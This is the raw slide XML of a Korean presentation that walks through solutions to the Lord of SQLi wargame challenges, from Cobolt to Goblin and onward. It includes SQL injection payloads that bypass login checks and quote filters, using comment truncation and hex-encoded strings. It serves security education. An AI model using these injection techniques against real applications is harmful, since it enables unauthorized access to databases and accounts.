              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 보내기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>칼럼에 암호화된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>해쉬값으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 저장하고 있지 않다면 항상 거짓이 나올 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>해쉬값으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 저장하고 있다고 해도 맞는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 알 방법이 없으므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 무력화시키는게 가장 좋은 방법일 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>https://los.eagle-jump.org/cobolt_e~0.php?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin' and pw='a'='a'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-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&amp;pw=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86507B-B54E-400B-BFB4-D1B3D09B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17" y="6277864"/>
            <a:ext cx="9882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prob_cobolt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'--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=md5('')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6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14CC-5B5E-4FBA-8AF8-CF0613787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Goblin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648B24-7F68-4DBC-A40D-0F1711F0E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9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1AA1971-66EF-447B-A1E9-E0C2A7232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2090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prob_goblin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='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guest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 and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="1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420413-C260-46F6-BE1B-AAC66A08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117693"/>
            <a:ext cx="1258388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&lt;?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include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"./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config.php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login_chk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dbconnect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|_|\.|\(\)/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Hack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preg_match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'/\'|\"|\`/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,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exit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Quotes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~_~"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select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from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prob_goblin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where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 and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$_GET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: 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strong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&gt;&lt;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br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@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mysql_fetch_array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mysql_query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query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"&lt;h2&gt;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Hello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&lt;/h2&gt;"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] ==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solve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goblin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D0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS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highlight_file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__FILE__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); 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?&gt;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이번엔 파라미터로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값만 받고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guest’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kumimoji="0" lang="ko-KR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고정되어있다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그래서 현재 고정된 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id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='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guest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' and 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no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=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{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>]}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> 거짓으로 만들고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or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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연산자로 새로운 조건을 줘야한다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 Unicode MS"/>
              </a:rPr>
              <a:t>항상 거짓으로 만들기 위해서 참값이 무엇인지 알아보았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode M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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://los.eagle-jump.org/goblin_5~8.php?no=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 해보면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>guest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값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>아니여서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Hello guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 출력되지 않고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://los.eagle-jump.org/goblin_5~8.php?no=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 해보면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>번이여서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin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</a:rPr>
              <a:t>Hello guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>라고 출력이 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항상 거짓으로 만들어야 하니 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id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='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guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>으로 주고 새로운 조건을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>연산자로 새로운 조건을 준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS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근데 이때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>싱클</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>더블쿼터가 필터링이 되어있고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>solve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 나오려면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</a:rPr>
              <a:t>id=‘admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이 되어야한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>하지만 쿼터가 안되므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>진수 변환을 통해 우회해보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>d=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>61646D696E (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>hex encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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/>
              <a:t>최종</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: id='guest' and no=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=0x61646D696E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80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1444</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>371</Paragraphs>
  <Slides>67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Arial Unicode MS</vt:lpstr>
      <vt:lpstr>굴림체</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>모두의 보안</vt:lpstr>
      <vt:lpstr>Gremlin</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>preg_match(뭘찾을지,어디서찾을지);</vt:lpstr>
      <vt:lpstr>Cobolt</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Goblin</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Orc</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Wolfman</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Darkelf</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Orge</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Troll</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Vampire</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Skeleton</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Golem</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Darkknight</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Bugbear</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Giant </vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Assassin</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Assassin_zombie</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Succubus</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Nightmare</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>오토 타입 캐스트(Automatic type cast)</vt:lpstr>
      <vt:lpstr>Xavis</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Dragon</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Iron_golem</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Dark_eyes</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Hell_fire</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Evil_wizard</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Green_dragon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128</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-05T12:17:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-27T05:07:03Z</dcterms:modified>
</cp:coreProperties>
</file>